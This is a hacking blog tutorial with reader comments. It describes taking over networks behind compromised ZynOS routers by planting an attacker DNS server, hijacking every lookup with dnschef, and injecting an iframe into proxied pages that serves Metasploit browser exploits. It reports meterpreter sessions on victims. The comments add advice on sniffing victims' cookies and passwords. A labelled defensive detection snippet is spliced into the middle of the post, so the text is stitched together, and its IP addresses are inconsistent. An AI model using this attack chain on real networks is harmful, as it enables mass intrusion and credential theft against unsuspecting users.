ZynOS – Part 2 ( Taking over the network )

Hello again🙂

I’m going to recap from the last post. What I’m about to demonstrate in this post is the impact an attacker can cause to your network once he has access to the router ..

We have access to the router, but our goal is to get a foothold on the remote network. Hmm .. we have the port forwarding option, which is beautiful: what we can do with that is scrape the network pool for internal IPs, forward ports like 445 and 139, and try to exploit them from our end. But imagine a network with 200 machines; that will definitely be time consuming, and even if you write a script to automate it, what makes you believe you’re actually going to get meterpreter sessions ?

So .. what’s the solution ?

Hmm, DNS is an interesting thing to look at, since we can hand the router a DNS server IP for the whole network to use !!

Are we talking about DNS interception ? Hell yeah😀

Here is a list of the tools we’re going to use :

Dnschef : A DNS proxy ( read about it HERE )
Metasploit : How to install ( ubuntu ) HERE
Webmitm : Find out more about it HERE
Burp Suite : It’s available HERE

-Attacking from Ubuntu, with Metasploit, dnschef and webmitm running on (IP: 192.168.0.6)

-Burp Suite will be running at (IP: 192.168.0.10)

First, I’ll explain how I’m going to do the attack :

We’re going to set up our dnschef proxy


./dnschef.py --interface 192.168.1.106 --fakeip 192.168.1.106

--interface : tells dnschef which interface to listen on.

--fakeip : hijacks every request by returning this IP as the answer to every query.

The next step is to launch the webmitm tool, which will handle the HTTP requests and responses; from there we’ll tell webmitm to forward the traffic to the Burp Suite proxy, which will let us inject an iframe pointing at the Metasploit browser autopwn server.


We have to configure Burp Suite so that it handles requests on port 80


The listener has to run in invisible proxying mode, since the victim’s browser doesn’t know it’s talking to a proxy ..


Repeat these steps for port 443 to handle HTTPS traffic .

Ok, so everything is ready now .. I’ll have to modify the scripts I provided in the previous post so that we can inject our DNS server .


This way I injected my IP address as the first DNS server the router uses, and the 2nd one is Google’s. That way, if we want to stop the attack on the already injected routers, we just block requests made to our DNS server, and the router will automatically fall back to the 2nd server (Google’s) without showing any DNS resolution error on the victim’s end.

Ok, so now we’ll have to launch the browser autopwn module in Metasploit .

PS: I’ll be using port “8080” because webmitm is already using port “80” to forward traffic .


It’s loaded and waiting for victims to browse🙂

Ok, so from here we’ll have to add the iframe injection to Burp Suite, so that when it gets a response for a page requested by the victim, it injects an iframe pointing at “http://192.168.0.6:8080/”, where Metasploit is listening.

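From the defender’s side, the setup described above leaves three fingerprints: every name resolving to the same address (dnschef --fakeip), a foreign primary DNS entry on the router in front of a legitimate secondary, and a hidden iframe in proxied pages pointing at a host that is not the page’s origin. The following checks are an added example, not code from the original post; the resolver answers, DNS settings and page body are constructed samples.

```python
import re
from collections import Counter
from urllib.parse import urlparse

# Constructed sample of what a LAN client gets back from the resolver the
# router now advertises: dnschef --fakeip answers every name with one IP.
SAMPLE_ANSWERS = {
    "www.google.com": "192.168.0.6",
    "facebook.com": "192.168.0.6",
    "update.microsoft.com": "192.168.0.6",
    "example.org": "192.168.0.6",
}

# Constructed sample of a proxied page carrying the injected autopwn iframe.
SAMPLE_PAGE = (
    "<html><body><h1>Welcome</h1>"
    '<iframe src="http://192.168.0.6:8080/" width="0" height="0"></iframe>'
    "</body></html>"
)

IFRAME_SRC = re.compile(r'<iframe[^>]*\ssrc=["\']([^"\']+)["\']', re.IGNORECASE)


def fakeip_suspects(answers, threshold=3):
    """IPs that answer for at least `threshold` unrelated names.

    A real resolver returns many different addresses for unrelated domains;
    one address answering for everything is the fingerprint of a catch-all
    proxy such as dnschef --fakeip.
    """
    counts = Counter(answers.values())
    return sorted(ip for ip, n in counts.items() if n >= threshold)


def off_origin_iframes(html, page_url):
    """iframe src URLs whose host differs from the page's own host."""
    page_host = urlparse(page_url).hostname
    return [src for src in IFRAME_SRC.findall(html)
            if urlparse(src).hostname not in (None, page_host)]


def dns_settings_drift(configured, expected):
    """Configured resolver IPs that the operator never set.

    Walks the router's DNS list in order, so a foreign primary sitting in
    front of a legitimate secondary (the layout used above) is caught.
    """
    return [ip for ip in configured if ip not in set(expected)]
```

Run the three checks periodically from inside the LAN: the DNS answers and the router’s DNS list can be collected from any client, and the iframe check can be applied to any fetched page.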

DEMO :

After injecting my DNS server into the victim’s router using the scripts, and after setting everything up from dnschef to Metasploit, let’s follow what happens when a victim browses to a website .


We got 3 meterpreter sessions😀,

DO YOU REALIZE WHAT SOMEONE CAN DO IF HE HACKS INTO YOUR ROUTER THROUGH SOME VULNERABILITY, OR JUST THROUGH DEFAULT PASSWORDS THAT YOU DIDN’T CHANGE ?

Any questions or comments feel free to contact me. And as always : Happy Hacking🙂

19 thoughts on “ZynOS – Part 2 ( Taking over the network )”

  1. HackiM says:

    great job dude
    that’s what i call automation

    root

  2. jove says:

    hi bro
    very nice job ….
    i have question …
    what can i do if want to sniff data such as cookie or password from data in router ?

    tanx

  3. jove says:

    i mean dont use Metasploit …. just sniffing data or fishing some website like facebook…

    sorry for spam

    • Nasro says:

      Hi, thanks for your comments . Well, I understand what you are willing to do .. so what i recommend is just proceed with the steps i provided and then launch your wireshark or any other packet sniffing software and then you should see data, basically all of the victim’s traffic is going through your computer🙂 .

      I hope this helps ..

      • jov says:

        tanQ, i use dnschef and webmitm -d and then i run dsniff and it works well. now i want to change the script because it uses a subnet cidr …. and i want to use an ip range :

        you use IPNetwork subnet :

        for ip in IPNetwork('0.0.0.1/24'):

        and i want to use ip range
        for example :

        netaddr.iprange_to_cidrs('0.0.0.1 , 255.255.255.255'):

        any idea ?

        tanq brother 🙂

  4. Led says:

    this site is no longer available : http://50.57.229.26/zynos.php !!

  5. Morched says:

    123 vive l’algerie😉
    sorry coz i’m so bad in english & i wanna learn from u if u want, but in arabic
    is there anyway to contact u ?

  6. Mohamed Essam says:

    Nasro can u make this tutorial in short video please
    i got some error when i use dnschef
    thx😉

  7. Ahmed Sherif says:

    Great Tutorial …. but how will packets be forwarded automatically from the burpsuite proxy

  8. […] Routers provided by Algerie Telecom, has also published the practical demonstration on ‘How to Hack Victim’s computer and accounts by hijacking Router’s DNS server‘. To perform this, he used DNS Proxy tool ‘Dnschef’ and exploitation tools […]

  9. flames says:

    Hi nasro,, can i contact u via email?

  10. mhndsh says:

    Hi,
    it’s a great Python code, that one for the zynos attack… but i can’t get results as the str1 is empty!! or the result of the decoded.php is something like “There was an error uploading the file, please try again!”.. like when you access the page like this:
    http://198.61.167.113/zynos/decoded.php
    any help please?

  12. Moussa MBS says:

    that’s good !!

  13. Raydan says:

    Hi Nassro

    good work

    while running the script I’m getting the following error

    Traceback (most recent call last):
    File "C:\Users\raydan\Desktop\zynos-attacker-master\zynos-attacker-master\attack.py", line 1, in
    from netaddr import IPNetwork
    ImportError: No module named netaddr
